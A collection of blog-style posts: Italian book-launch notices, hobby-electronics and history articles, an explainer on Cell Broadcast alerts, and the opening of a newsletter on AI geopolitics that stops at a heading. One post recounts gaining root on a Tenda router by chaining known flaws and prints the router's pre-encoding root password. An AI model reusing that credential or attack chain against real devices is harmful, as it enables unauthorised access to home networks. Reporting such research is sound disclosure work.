Presentazione di Guerra Profonda a Lanciano


The media in this post is not displayed to visitors. To view it, please log in.

Il 14 settembre 2026, dalle ore 17:00, a Lanciano, si terrà la presentazione del libro di Arturo Di Corinto, “Guerra Profonda. Hacker, bugie e l’architettura segreta dei nuovi conflitti”.

Il libro Guerra Profonda, edito da Luiss University Press, sarà presentato e discusso dall’autore, Arturo Di Corinto con la partecipazione di relatori d’eccezione, tutti originari della cittadina teatina:

Arturo Di Corinto, giornalista

Nicola Grandis, Ceo ASC27, creatore dell’AI Vitruvian

Antonio Teti, Università di Chieti

introduce il Sindaco di Lanciano, Filippo Paolini

presenta la giornalista Mila Fiordalisi


dicorinto.it/tipologia/present…


Guerra Profonda al Centro Studi Americani di Roma


The media in this post is not displayed to visitors. To view it, please log in.

Il 16 settembre 2026, dalle ore 17:00, si terrà la presentazione del libro di Arturo Di Corinto, “Guerra Profonda. Hacker, bugie e l’architettura segreta dei nuovi conflitti”.

Il libro Guerra Profonda, edito da Luiss University Press, sarà presentato e discusso con l’autore, Arturo Di Corinto in un panel di relatori d’eccezione:

Barbara Carfagna, giornalista Rai

Giampiero Massolo, Direttore esecutivo Mundy’s

Marco Ramilli, CEO identify

Luca Tagliaretti, direttore esecutivo ECCC


dicorinto.it/tipologia/present…


Going Full Fruity with Apple’s 1999 High-End Power Mac G3


The media in this post is not displayed to visitors. To view it, please log in.

Back in the late 90s, Apple was definitely a pretty fruity company, with its aggressively translucent shades of colored plastic that often got described in terms of such fruit variants. Although the iMac steals a lot of the glory here, the Power Mac series and associated hardware deserves that spot in the limelight as well. Recently [Dan Wood] put together a full Power Mac G3-based setup, including the appropriate LCD monitor and other peripherals as someone with some serious disposable income back in 1999 might have owned.
Why Macs are better than PCs. (Credit: Dan Wood, YouTube)Why Macs are better than PCs. (Credit: Dan Wood, YouTube)
Part of Steve Jobs’ return to Apple, the Power Macintosh G3 debuted first in basically recycled beige enclosures from previous Macintosh systems before its second generation introduced the Blue and White version, as it was officially called. This dazzling style was carried through in the peripherals, with pin stripes, translucent plastic and a distinct absence of sharp corners or edges.

As for what you get in these colorful Power Mac G3s, a 300 to 450 MHz CPU, an official memory limit of 192 MB and perhaps the most user-friendly way to access the logic board to upgrade and install components with the folding lid. Something which had PC users with sharp edged cases and plentiful blood sacrifices to the PC gods somewhat steaming in jealousy.

For the time these Power Mac G3s didn’t just look fetching, they also were quite powerful. Something which came at a pretty hefty price tag, of course. The 400 MHz model that [Dan] got his paws on would have cost around $2,000 back in 1999, or closer to $4,000 clams today. The active-matrix TFT LCD screen would have been cutting edge as well, with a similar cutting edge price tag.

Released before OS X this system runs Mac OS 8.6, though it can run OS X 10.4 (Tiger) which unlocks more software options and of course the transition a proper multi-tasking OS. This particular system was apparently used for graphics design until 2010 based on the files on the HDD. As demonstrated in the video, the system is still quite usable, even in 2026, thanks to all the software available online.

youtube.com/embed/DS0IF1PxchM?…


hackaday.com/2026/08/06/going-…


FitzRoy’s Glass: Victorian Weather Marvel or Glorified Thermometer?


The media in this post is not displayed to visitors. To view it, please log in.

Everyone talks about the weather. This is doubly true for sailors, where bad weather could mean a very bad day. So it isn’t surprising that navies around the world have had a keen interest in weather forecasting. But how did you predict the weather before modern instruments, radar, and satellite images? Vice Admiral Robert FitzRoy had great faith in “storm glasses,” a glass chamber containing some chemicals that he didn’t invent, but did document and promote heavily during the 1860s.

Did it work? Apparently not, but the device is still interesting in its own right. FitzRoy was a pioneer of meteorology, replacing folklore with actual observations and attempts at scientific rigor. While he did arm observation stations with conventional things like thermometers and barometers, he was also a proponent of the weather glass.

What is it?

A storm glass in action. Yep! It is cloudy.
The glass itself was a sealed glass vessel, often a tube, that contained a mixture of alcohol and water. In that mixture were camphor, saltpeter, and sal ammoniac.

The camphor will precipitate out or dissolve into the solvent, forming amazing crystal patterns. According to FitzRoy, the liquid will be clear if the weather is clear, and cloudy if it is cloudy outside. Different sizes of particulates indicate rain, snow, and other weather phenomena. FitzRoy thought the wind had “electrical tension” and that was responsible for the device’s ability to predict weather.

Scientific studies showed little correlation between the state of the glass and the weather. However, it is still a great conversation piece.

Despite the salts in the recipe, the spectacular crystals in a storm glass are primarily camphor. Camphor dissolves readily in alcohol but poorly in water, while potassium nitrate (saltpeter) and ammonium chloride (sal ammoniac) have roughly the opposite preference. The mixed alcohol-water solvent accommodates all three, but the camphor sits close enough to its solubility limit that temperature changes cause it to crystallize and redissolve. The salts appear to affect the form of the growing crystals, helping produce the elaborate dendritic structures that make the glass look so dramatic.

Maybe it Works?


FitzRoy was convinced the glass was effective. However, in 1863, Charles Tomlinson wrote in The Philosophical Magazine that the instrument was little more than a crude thermometer. This was later suggested in a 2008 article, as well.
Up close with the storm glass crystals.
Proponents of the glass will tell you that they need to be placed very carefully, out of climate-controlled areas. They also, apparently, say you have to initially heat the liquid until the crystals are totally dissolved. After a few weeks to adapt, they swear the Storm Glass is a perfectly good weather prediction system.

Despite their unreliable nature, the storm glass was a popular item, and you can even find them today, more as decor. But in 1863, you could find a variety of choices with and without thermometers attached, as you can see in the James J. Hicks catalog page.

Before the Glass

This 1863 catalog had a number of storm glasses available.
Of course, people were interested in the weather well before the late 19th century. Even FitzRoy admitted that the storm glass was at least 100 years old by his day. The game changer was the electric telegraph.

The telegraph allowed for widespread real-time observations. FitzRoy was a pioneer in that game, as was his mentor Sir Francis Beaufort, famous for developing the Wind Force Scale, sometimes known as the Beaufort scale. If you read his writings, he was, for the most part, on the right track for weather observations. But the storm glass that is most closely associated with his name wasn’t really the thing you wanted to be remembered for.

You can make your own storm glass, as you can see in [NightHawkInLight’s] video below. Maybe you can determine whether it really works. Or take your weather station into the modern era.

youtube.com/embed/3cWpo5BoahA?…

Featured image: Baromètre de Fitroy ou ou verre-de-tempêtes by [Anja]


hackaday.com/2026/08/06/fitzro…


Amiga and Commodore, Back Together (Sort Of)


The media in this post is not displayed to visitors. To view it, please log in.

The story of Commodore, the famous manufacturer of home computers, is a murky one at best. Commodore fans will decry their woeful marketing and dismal product roadmap, while former employees such as our Hackaday colleague [Bil Herd] have shone a bit of light on the goings-on behind the scenes. The company’s final demise in the collapse of the German company Escom scattered its parts to the four winds, but now we find a potential return to clarity.

Amiga Corporation, holders of much of the Commodore and Amiga IP, have reached agreements with Commodore International Corporation, the recently formed face of the Commodore brand, and Hyperion Entertainment BV, who have been behind a series of Amiga developments over recent decades.

The press release provides a fascinating map of the Commodore and Amiga ecosystem as it stands in the 21st century, something which has sometimes eluded fans. As we understand it the rights to the 8-bit IP reside alongside the rights to the Amiga IP with Amiga Corporation, and it’s these 8-bit rights, or at least the software and documentation within them, that have been licensed to Commodore International Corporation. Meanwhile in a separate agreement the rights to continued development of AmigaOS 4.x remain with Hyperion, while the AmigaOS 3.x versions for the 68k Amigas will revert to Amiga Corporation at the end of 2027.

As far as we can see then, this should enable Commodore International Corporation to produce their line of 8-bit Commodore 64s and other machines, while Hyperion continue to serve the AmigaOS 4.x community. The interesting part comes in the AmigaOS 3.x versions, for which Amiga Corporation say they will continue to direct the development and evolution. Does that mean we’ll eventually see a 68k Amiga of some kind licensed through a company such as Commodore International Corporation? It’s an interesting prospect, and a story we’ll follow.


hackaday.com/2026/08/06/amiga-…


Only the Hottest Tunes Play on This Fire Organ


The media in this post is not displayed to visitors. To view it, please log in.

Most musical organs use air as their working fluid, but there’s nothing in the rule book that says they have to. Calliopes have used steam for 150 years now, while [Look Mum No Computer] has opted to go full pyromaniac and pump propane though the summer’s hottest new instrument.

Just like every steam or compressed-air organ we’ve heard, the tuning could use some work — though we have faith [LMNK] will get to that in due time — and just like the circus organs of yore, it sits upon a trailer for easy transport. That may or may not be to flee from fire marshals, because the whole point of the propane organ isn’t to waste flammable gas: it’s to burn it. The fire itself doesn’t make a sound; that’s the propane going through the copper organ pipes. Igniting it is just bonus, and what a bonus it is!

Said ignition is provided by regular spark plugs and ignition coils, like you’d find in any internal combustion engine. An earlier version used pilot lights, but those had an annoying habit of blowing out and were wasteful of propane to boot. This way the same MIDI signal that controls the gas valve can set the ignition off, and provide a light show to go with the sound. The video embedded below deals with building this new ignition setup, but he has other videos on the channel detailing other aspects of the construction. If you’re not so interested in that and just want a performance, jump right to 16:47 for the obligatory Toccata and Fugue.

Perhaps [LMNK] will write a theme tune for his museum of obsolete technology on this organ, with accompaniment from his rope-core drum machine, and effects on his tape delay synth.

youtube.com/embed/xycv2DKSjaI?…

Thanks to [the gambler] for the hot tip!


hackaday.com/2026/08/06/only-t…


Hacking a Tenda AC1200 Wi-Fi Router with a CVE Combo


The media in this post is not displayed to visitors. To view it, please log in.

Iz in ur Tenda AC10V6, hax0ring your printf output. (Credit: Low Level, YouTube)

It’s rather awkward when you buy a piece of hardware like a sketchy router to make a video about its hidden admin password backdoor – known as CVE-2026-11405 – only to discover that you bought the wrong Tenda router, namely the AC10V6 model. After making this mistake, [Low Level] did the only reasonable thing one ought to do in this case, and try to find an exploit in this ‘wrong’ router as well.

The obvious start here is to do the same as with the other exploit, in that you download a firmware image from the manufacturer’s website, then pluck it apart using binwalkto do an initial check for juicy files. After that tools like Ghidra can be used to do a more in-depth analysis of any binary files, with a special focus on things like user-facing elements like login screen, as input validation will likely forever remain the number one type of exploited CVE.

One major change that Tenda made here was to encrypt the firmware image, which seemed suspicious. With that easy path blocked, the research of others on different Tenda routers was looked at, including the AC20 with the fascinating Telnet exploit in the form of CVE-2025-9090 where merely poking a file on the device turned on the Telnet service. This left the minor issue of finding a password to log into said Telnet session.

Iz in ur Tenda AC10V6, hax0ring your printf output. (Credit: Low Level, YouTube)Iz in ur Tenda AC10V6, h4x0ring your printf output. (Credit: Low Level, YouTube)
This is where CVE-2025-52054 comes in handy, as this explains how to calculate the root password of a Tenda router using a static string and the last two octets of the device’s MAC address. The unfortunate aspect here is that this static string is unknown for this particular router, and the AC8 version did not work. Luckily, for some unknown reason Tenda did decide that they had to print this secret information to the serial output, ergo it was time to probe the UART pins on the router’s guts.

One hard reset later and the console output on these UART pins happily showed that the password pre-Base64 encoding was 9cUFeUZC_125700. Mashing in the Base64-encoded string in the Telnet login gave root access and completed the first step of the whole fun, as now [Low Level] also had access to the decrypted firmware including the decryption keys for the previously safely encrypted firmware image.

There will be a blog post published with likely the keys and other details after clearing it with [Low Level]’s lawyer, but even at this point it’s truly a tragedy of CVEs on the side of Tenda that led to this outcome. If you ever needed a reason not to let friends use Tenda routers, this has got to be another good reason.

youtube.com/embed/2t6-AxpZXiA?…


hackaday.com/2026/08/05/hackin…


3D Printing A Usable Airless Tire


The media in this post is not displayed to visitors. To view it, please log in.

For decades now, companies like Michelin have been teasing us with futuristic-looking automobile tires that don’t use air. Instead, they use a polymer mesh of sorts which maintains the same pressure on the travel surface that a pneumatic tire does, with much less maintenance than their pneumatic counterparts. At least, in theory. There’s a reason that these tires live in the same mythical realm that Half Life 3 and the modern affordable Volkswagen do, and [Berm Peak] decided to discover those reasons for himself.

Of course, [Berm Peak] isn’t building these for his daily driver, an electric pickup truck featured in previous videos of his. He’s putting these on his mountain bike instead, a challenging environment for a tire like this in its own right. When mountain biking at the level he does, punctures and flats can become a real nuisance on the trail, so he set about experimenting with these designs with the 3D printer to see if he could make something rivaling pneumatic technology. After a few design iterations he settled on a TPU-based version with a compliant S-shaped spacing between the tread and wheel. The tire printed in sections that are installed by joining them together on the bike rim with a separate 3D printed rim interface.

At the end of this process [Berm Peak] ends up with a surprisingly capable tire that mostly holds up to his extreme off-road testing, an impressive feat for something 3D printed in his shop. Presumably a company specializing in bicycle tires could build something even more capable, but it turns out that a different technology has already solved all of the problems that airless tires solve. Mountain bikers today almost exclusively ride on tires with sealant, so punctures and flats are essentially a solved problem. But the neon-green airless tires were still a fun project for [Berm Peak] and quite the head-turner out on the bike trails.

youtube.com/embed/3mrCWFEO_3s?…


hackaday.com/2026/08/05/3d-pri…


Full Teardown of a 2026 Amazon Fire Stick HD


The media in this post is not displayed to visitors. To view it, please log in.


Die of the Amazon Fire Stick HD (2026) PMIC IC. (Credit: electronupdate, YouTube)Die of the Amazon Fire Stick HD (2026) PMIC IC. (Credit: electronupdate, YouTube)
After the release of Google’s Chromecast so-called ‘streaming sticks’ have remained a popular form factor, even though such technology is these days part of ‘smart’ TVs. Being curious as to what kind of hardware they put into these sticks or dongles these days, [electronupdate] decided to do his typical full teardown of a 2026 model Fire Stick HD from Amazon, including the typical nekkid die shots.

Although most of the bits inside are fairly typical, being just your typical Mediatek-sourced solution, the ceramic patch antennas for Bluetooth and Wi-Fi are a rather interesting detail, as are the purported limitations that make this the ‘HD’ version of the Fire Stick, unlike its 4K brethren.

The used Mediatek MT8698D SoC isn’t so different from the SoC in those 4K versions, with the 2025-era 4K Plus using the MT8696D, but the 4K Select using basically the same SoC as the HD version, featuring the same G310V2 GPU at 500 MHz per the Amazon Developer documentation and the same decoder block (VPU), both of which are capable of 4K video decoding. This implies that the HD vs 4K distinction is purely software-based.
The Amazon Fire Stick HD PCB devoid of its metal shielding. (Credit: electronupdate, YouTube)The Amazon Fire Stick HD PCB devoid of its metal shielding. (Credit: electronupdate, YouTube)
After popping open the device and noting the various ICs, the NAND Flash, the Mediatek MT7902 wireless IC, the PMIC and the aforementioned SoC all have their caps popped in order to take a closer look at their dies. For reference, as one of the largest ICs, the SoC die is a mere 5.2 x 6.45 mm. The PMIC die is more interesting as usual, as this one integrates USB-PD functionality, adding quite a bit of logic to what is otherwise a fairly mundane bit of power management features.

Overall not a very surprising design, though it does tickle that thought in the back of one’s mind whether it could be turned into a ‘4K stick’ with a few software tweaks, or perhaps more simply by installing plain Android onto its 8 GB of eMMC.

youtube.com/embed/t65qNv5bvQc?…


hackaday.com/2026/08/05/full-t…


Addressable LEDs Make Giant 16×2 Character Display


The media in this post is not displayed to visitors. To view it, please log in.

We’ve always taken a certain childlike joy in seeing tiny things made big, and big things tiny. Evidently [Uncle Stem] is the same way, if this 7x sized 16×2 “LCD” display is any indicator.

“LCD” is in scare quotes there, because while the original display is a character LCD, [Uncle Stem]’s embigginated recreation is not. Liquid crystal displays are beyond all but the most dedicated DIYers, so [Stem] recreated the whole thing with addressable LEDs instead — over a thousand of them. Each character got its own PCB, and rather than pay for assembly [Stem] used a 3D printed stencil to help apply solder paste, an idea we’ve seen before. His choice of long lengths of nickle strip — the stuff you spot weld to Li-ion batteries — to join the LED-holding PCBs is also worth noting.

In order to get his giant display to act like the I2C-operated module he loves, [Uncle Stem] equipped it with an RP2040 pre-programmed with the LCD character set. That way he can plug it into any Arduino project that uses the LiquidCrystal_I2C library and have the authentic 1602 experience. The green “PCB” the display is mounted to is actually laser-cut plywood, while some acrylic sits in front of his PCBs with office paper to act as as a diffuser. A 3D printed frame completes the illusion. He even goes so far as to replicate the pin headers at 7:1 scaling with brass rods.

He also connects it to a over-sized Arduino, with giant jumper wires. But for the record, not the giant Arduino we featured previously. Like we said, hackers like to mess with scale, and we’ve seen everything from giant benchies to a working Mac Classic for Barbie.

youtube.com/embed/m5QbG7QSgWc?…


hackaday.com/2026/08/05/addres…


FLOSS Weekly Episode 878: A Tool With Opinions


The media in this post is not displayed to visitors. To view it, please log in.

This week Jonathan chats with Jonathan Pallant about embedded Rust! Learn about the growing Rust driver library, the different ways to build a Rust stack on an embedded device, and how the opinionated tooling can make you a better programmer!


youtube.com/embed/ah11nzclXag?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or have the guest contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License


hackaday.com/2026/08/05/floss-…


Know Your Food: Our Daily Bread


The media in this post is not displayed to visitors. To view it, please log in.

It’s time to return to our no-punches-pulled look at food manufacture, and this time we’re looking at the humble loaf of bread. As before, we’re approaching the subject with a look at breadmaking both in the traditional sense that marketing people would like you to imagine, and in the modern sense of the loaf you’ll find on your supermarket shelf.

A Food Of Great Cultural Significance

An ancient Egyptian relief, showing stylised figures at work on a variety of baking tasks.An ancient Egyptian bakery, depicted in the reign of Ramesses III. Scanned by Peter Isotalo, CC BY-SA 4.0.
Perhaps there are few foods with as much cultural significance as bread. If your distant ancestors took the path of growing grain as their major subsistence carbohydrate, the chances are there will be some form of bread woven into your identity. Where this is being written for example were I to head for the cathedral of a Sunday morning I would recite the Lord’s Prayer as part of the service, Give us this day our daily bread. Whether your culture leavens its bread or not, or whatever grain it uses, the chances are that there will be something similar about the humble foodstuff within it.

Sitting in a coffee shop writing this a few streets away from that cathedral in a British county town, the bread here is made from wheat flour and leavened using yeast. I’d hazard a guess that it’s the loaf most of you reading this will find at your local store, and with apologies to people whose bread takes a different form it’s the bread I’ll be examining here. It’s the loaf the wheat fields where I grew up supply grain for, so it’s the one whose production I’m most familiar with.

The Ideal Bread, At Least For The Adverts

A baker stands next to the opening of his oven, a fresh loaf of bread on his paddle. In the foreground is a stack of loaves.We all want our bread to come from a bakery like this one in Malta. Noport, CC BY-SA 4.0.
Advertising for bread is steeped in a tradition both real and imaginary, but behind the image does lie an artisan past. Very few English villages did not have a mill or a baker, whether the stone grinding wheels were driven by water or wind. The bread would have been made in much the same way as you’d make it in your 21st century kitchen, with the flour being mixed with water to a dough, before being slowly proved and leavened using a yeast culture, and baked. The oven would have been a wood-fired domed clay or brick affair rather than a gas or electric device, and perhaps our artisan baker of yore wouldn’t have used a neat rectangular tin, but the final product would be something you’d recognise.

You can still buy artisan bread made this way and it’s a fine product, but despite the industry leaning heavily on such imagery the loaf in your supermarket is not quite the same. This is not a judgement on its quality but a statement on the technological advancement that has given us an affordable, consistent, and often high quality mass produced product.

First, Chase The Ingredients

A green and white Claas combine harvester at work.These things are the symphony of my summer. Reinhold Möller, CC BY-SA 4.0.
So to start with 21st century bread making, we need to stand in an Oxfordshire field like the one surrounding where I grew up. It’s the end of July, so the wheat is being harvested. The field will be part of a crop rotation scheme, so it may have had canola, beans, or any of a number of other crops grown in it the previous year. The wheat may be so-called hard wheat, usually a winter wheat with a high gluten content planted last autumn, or depending on the bread process it can be a spring-planted variety with a lower gluten content.

The wheat will be stored by the farmer in a silo until the best price can be had for it, then once sold it goes to a mill. A modern industrial mill rather than the rustic watermill of our previous description, but the principle is the same. The grain may be moistened to aid the separation of its outer husk, and then it’s passed through sets of rollers to grind it. This results in a flour, but it’s not the flour you buy, nor is it the flour that goes into your bread.
A cross section of a wheat seed, with nutritional information.A wheat seed, in fine detail. Jon C, CC BY-SA 3.0.
A single piece of grain, a wheat seed, is loosely comprised of three components. The endosperm is the white flour portion you may recognise, the wheatgerm is the embryo, the part of the grain which germinates, and the outer husk is referred to as bran. The raw flour is wholewheat flour and you can bake with it, but it has the problem of a limited shelf life as the wheatgerm will spoil after milling if left. This the three components are separated, and the wheatgerm is heat treated to render it inert. The flour used for baking bread is thus compounded from these components to the formulation required, along with a set of additives to preserve it, improve its baking qualities, or add vitamins and nutrients. For a flour to be referred to as wholemeal its proportions of these components are defined by law, at least where this is being written.

The other major bread ingredient is yeast, which for a modern baker is a carefully maintained monoculture of a yeast strain selected for best performance in baking. The traditional method of farming a yeast strain is something we had a look at back in the pandemic when there was a shortage of the stuff, and its industrial equivalent is a much more sterile and scientifically controlled version of the same thing. It will arrive at the baker not as the dried yeast you’ll pick up at the supermarket but as a damp paste, which will be activated by dissolving it in a sugar solution.

A Loaf That’s Better Bread


For a traditional or specialty style bread then, the baker will take a compounded strong flour and fresh yeast, and follow a surprisingly similar process to that of the rustic baker mentioned earlier. The equipment will be stainless steel and the quantities may be greater, but our baker from the past would recognise it. It makes lovely bread, and you have no doubt enjoyed it in your time.
A loaf od sliced brown bread, cascading from its bag onto a plate.The Chorleywood loaf in the kitchen chez List as this is being written.
The more mundane loaves in your supermarket though, are not made in quite the same way. They take flour and yeast and make a leavened dough just as with a traditional loaf, but the process is very different indeed. The Chorleywood process, named after the town hosting the research institution where it was invented, is a high-speed baking process designed to use a wheat with a much lower gluten content than traditional bread. The problem facing the mid-20th-century researchers who created it was that the UK’s climate and agriculture isn’t suitable for growing the quantities of hard wheat its bread market demanded. Their innovation was to replace the leavening and proving of the traditional bakery with high-speed mechanical mixing, which since some of the gluten is broken down in the traditional fermentation, requires less gluten. The result is an extremely fast industrial process that produces an extremely consistent light and fluffy bread, and over the last three quarters of a century it has become the dominant loaf. It’s likely that wherever you are, a similar process tailored to your country is also responsible for most of your bread.

So you now know a little about where your daily bread comes from, and how it is made. As is usual for this series, it’s now time to look at the various claims and controversies surrounding the modern loaf, which can sometimes even take on a political dimension. Is the nutritional value of a supermarket load less than that of an artisan loaf made by that village baker? This is a question which has caused some considerable controversy over the years.

As we said earlier, modern flour is a refined and processed product whether it’s wholemeal or bleached white, and a process such as the Chorleywood one is designed to make a loaf from a cheaper ingredient. It’s then not unreasonable to suppose that the artisan loaf might be a better product, and in the sense of flavours and textures imparted by the traditional process you would probably be right to take that view. An artisan loaf is a high quality culinary experience.

But from the nutritional perspective it becomes a much less clear-cut assessment, because while a true artisinal loaf contains all the nutrients of the raw grain, the formulated flour used by the industrial baker has its nutrition precisely controlled. If the recipe uses a high-nutrition flour then the resulting bread has a high nutritional value, and since at least where this is being written such things are regulated, you can eat a Chorleywoord loaf with confidence that it’s not a nutritional desert.

As a parting thought I’d say this: eat the highest quality bread you can, support artisan producers if you can, you’ll eat some really nice bread. But don’t worry too much about the cheaper stuff, it’s only cheaper because it’s mass-produced, not because it’s worse for you.


hackaday.com/2026/08/05/know-y…


Reading a Thermocouple with Mercury and a Potentiometer


The media in this post is not displayed to visitors. To view it, please log in.

A man's hand is shown adjusting a black Bakelite dial on the front panel of an instrument. The instrument is contained in a wooden box, and to the left of the box, a thermocouple is inserted into the flame of an alcohol burner.

If you’ve ever thought about the nomenclature of electrical components, potentiometer stands out as a strange name, etymologically suggesting something like a voltmeter. In fact, the component took its name from a voltage-measuring instrument also named the potentiometer. [Alnwlsn] recently took a look at one such device, which was integrated into a thermometer, and the Weston cell used to calibrate it.

The potentiometer (instrument) has a galvanometer at its heart. One side of the galvanometer is connected to the center lead of a potentiometer (component) which spans a voltage source; the other side is connected to a reference voltage. The potentiometer can be adjusted until no current flows through the galvanometer, at which point both sides match the reference voltage. The reference voltage source can then be replaced with some other source, which can then be measured relative to the reference by adjusting the potentiometer until both the voltages match. The reference voltage source is a Weston cell, which uses two mercury electrodes, one amalgamated with cadmium, to produce a stable 1.018 volt reference; despite being 74 years old, this particular cell still measured at 1.017 volts.

In this case, the potentiometer was made to measure the voltage produced by a thermocouple. After calibrating the potentiometer and connecting an iron-constantan thermocouple, [Alnwlsn] tested it with ice and boiling water, and in each case it proved accurate. In a more extreme test, it captured the temperature difference between the base and the tip of an alcohol flame.

For a bit more on the history of similar devices, check out the history of Weston Electrical Instruments.

youtube.com/embed/NQvPDH1g4Hs?…

Thanks to [PeterF] for the tip!


hackaday.com/2026/08/05/readin…


Cell Broadcast: The Modern Emergency Alert System


The media in this post is not displayed to visitors. To view it, please log in.

Once upon a time, telephones were primarily point-to-point communications systems. There were options for three-way and conference calls out there, but by and large the plain old telephone system was about connecting one handset to another for a direct conversation. For this reason, the telephone was seldom used for mass emergency communications, because it was simply not fit for broadcasting a message to a wide number of people.

However, technology has since changed. Our modern phones are all connected to a big digital over-the-air network, and large swathes of them can be addressed all at once if so needed. This has led to the development of emergency warning systems that use the cellular network, with Cell Broadcast being the most notable iteration.

Notification


Cell Broadcast technology has been a part of mobile network infrastructure for some decades now, having been included in various forms in 2G, 3G, 4G, and 5G mobile standards. The system was first demonstrated in 1997 in Paris, with the concept being straightforward enough—a way for cell networks and authorities to send rapid notifications in a one-to-many broadcast. The technology is sometimes referred to as Short Message Service-Cell Broadcast (SMS-CB), differentiating it from the more familiar Short Message Service-Point to Point (SMS-PP) that individual subscribers use. A Cell Broadcast message can be fired off to select cells of a cellular network, with the notification in turn popping up on the handsets of all subscribers connected to that cell. This allows for easy geofencing of emergency alerts and information, such that only individuals in the relevant area receive the Cell Broadcast message.
The infamous false alarm missile warning message sent out in Hawaii in 2018 was, in part, distributed via the Wireless Emergency Alerts system using Cell Broadcast. Credit: public domain
By firing a Cell Broadcast to entire mobile networks across a country, it’s possible for authorities to get a message out to millions of phones in mere seconds—a remarkably effective way of communicating critical information quickly.

A typical Cell Broadcast emergency message will be announced by a special alert tone with the textual message content appearing on the phone in turn. Messages can be sent in a primary and an additional language and displayed according to a devices individual language settings to aid in accessibility. There is also generally no need for a given device to have a SIM card installed, since the Cell Broadcast messages are not addressed to any given individual subscriber number.

Modern Cell Broadcast messages can be up to 1,395 characters long using Latin characters, or up to 615 characters in languages using UCS-2 character encoding. Messages can be set to refire from every 2 seconds to over 30 minutes, with handsets typically ignoring rebroadcasted messages that have already been displayed. In turn, new messages can also be sent quickly to reflect changing conditions or updated information.

Cell Broadcast messages can come in several different levels depending on the intended severity of the alert. These are identified by hex codes laid out in 3GPP standards, though the exact alert levels vary across different national implementations of the system. In the EU, they are ranked from Alert Level 1 (most severe) to Alert Level 4 (least severe) with additional levels for “Amber,” “Test,” and “Information” alerts beneath. Levels below 1 can be “opted out” on certain handsets with the functionality to do so. Similarly, in the US, the highest level is “National Alert” which can not be opted out of and will always fire on handsets receiving the message. Below that, the levels step down to “Extreme Alert,” “Severe Alert,” and “Public Safety Alert,” with Amber Alerts and test levels beneath that.
Some handsets allow opting out of lower-level alerts. The highest-level CB alerts will typically sound a tone and display on all capable handsets, regardless of volume settings or silent or “Do Not Disturb” modes. Credit: Aveaoz, CC BY-SA 4.0
Many nations have built emergency communications systems around the Cell Broadcast infrastructure. Since a high percentage of populations in developed countries own cellular phones and keep them close at hand at all times, it serves as a highly effective way to distribute emergency warnings. Many countries simply name their systems after their own nation—such as FR-Alert and DE-Alert in France and Germany, to T-Alert in Thailand. Others get more creative, such as S!RENEN in Denmark, or more descriptive, such as the Disaster and Emergency Warning Network (DEWN) in Sri Lanka.

Despite Cell Broadcast having existed in various forms across previous generations of mobile networks, some nations are still yet to fully implement emergency warnings over this infrastructure. Notably, Australia is in the process of rolling out AusAlert in 2026, with the first national test of the system firing off on the 27th of July, 2026. Authorities noted that 94% of targeted cell towers broadcast the message succesfully, though there was some controversy around some phones not displaying the broadcast message, and concerns around secret phones being revealed by the test which would sound regardless of silent or “do not disturb” modes. Other countries still developing Cell Broadcast emergency systems include India, Poland, Ukraine, Sweden, and Brazil.
Not all CB messages are high-level emergencies. Above, a cold weather warning sent out via Cell Broadcast in South Korea. The device in question had a German language setting, hence the message title in a different language. Notably, SMS-CB messages sent in non-Latin alphabets feature a lower character limit. Credit: Verganglichkeit, CC BY-SA 4.0
There are limitations to Cell Broadcast. Namely, as a one-to-many broadcast message, it’s not directly possible for authorities or telecommunications operators to determine how many or which subscribers may have received the message. The technology is effectively a “push” message system with no backchannel for confirmation of receipt. This is somewhat by design, however, as thousands or millions of devices sending a read receipt via the network would create huge network congestion. This would be particularly undesirable during an emergency situation.

Regardless, the Cell Broadcast methodology has key benefits for emergency and mass notifications compared to other methods of reaching out via the mobile network. Most of all, it’s a message that is broadcast rather than sent to individual subscribers. Sending the same notifications via SMS or MMS would require huge amounts of network capacity as each individual message for each individual phone number was sent out.

There are also logistical difficulties in such a method, wherein a list of valid phone numbers must be maintained and updated at all times. It can also be more difficult to do things like geofenced messaging, since individual subscribers and their phones tend to move around a fair bit.

Hopefully, you’ll never find yourself wrapped up in a major weather event or other serious emergency. If you do, though, you might just find that critical information you need to survive thanks to a timely Cell Broadcast message. Expect such systems to become a baseline part of emergency management efforts in future as long as cellphones remain a ubiquitous communication tool across the population.


hackaday.com/2026/08/05/cell-b…


The global battle for AI, revisited


The media in this post is not displayed to visitors. To view it, please log in.

The global battle for AI, revisited
WELCOME TO THE FREE MONTHLY EDITION of Digital Politics.I'm Mark Scott, and many of you (I hope) are on vacation. A lot has happened so far in 2026. With the summer lull upon us, this week's edition is updating a piece that I wrote for POLITICO in 2024 about the global race to control artificial intelligence.

It's not a like-for-like comparison. Back then, I was a tech reporter. Now, I'm a think tanker (and newsletter writer.) But the underlying question — about who will control the emerging technology for years to come — has not changed.

If anything, it's become even more complex.

Let's get started:


TWO SUMMITS, DIFFERENT AGENDAS


ON A WET AFTERNOON IN LATE 2023, the likes of former US vice president Kamala Harris and then-senior Meta executive Nick Clegg trudged into a wind-swept tent an hour north of London. They had gathered to show a united front against what many feared would be a threat to the world: uncontrolled artificial intelligence. After late-night negotiations, the outcome was the Bletchley Declaration, a voluntary commitment by 28 countries, including the United States and China, to identify and respond to existential risks tied to the emerging technology.

Fast forward two years, and Narendra Modi, India's prime minister, stood in front of a podium in February to address thousands of conference attendees at a purpose-built convention center in New Delhi. His speech — translated simultaneously into 11 languages via AI — had followed announcements from Google, Tata and Anthropic about multi-billion dollar investments in India's fast-growing economy. The event's communiqué, signed by 92 countries and international bodies, only paid lip service to the safety concerns that had been central to the United Kingdom's inaugural AI summit.

Instead, the so-called AI Impact Summitin New Delhi was, above all, about the economic gain to be derived from the technology. "This is the fourth AI summit since Bletchley Park," Anthropic chief executive, Dario Amodei, told conference-goers. "We are increasingly close to a country of geniuses in a data center, systems more capable than most humans at most tasks."

What follows is an assessment of the global race for AI in 2026. It focuses on four themes that remain central to this geopolitical battle: 1) Who sets the rules?; 2) What do those rules look like?; 3) How corporate lobbying merged with countries' priorities; 4) How AI merged with national security.

These themes are obviously intertwined. But, above all, this update on the global race around AI tracks the rise of geopolitics, the disintegration of a Western consensus around AI safety/governance and a fundamental change in the global debate since officials first gathered at Bletchley Park in November 2023.


The splintering of AI-rulemaking


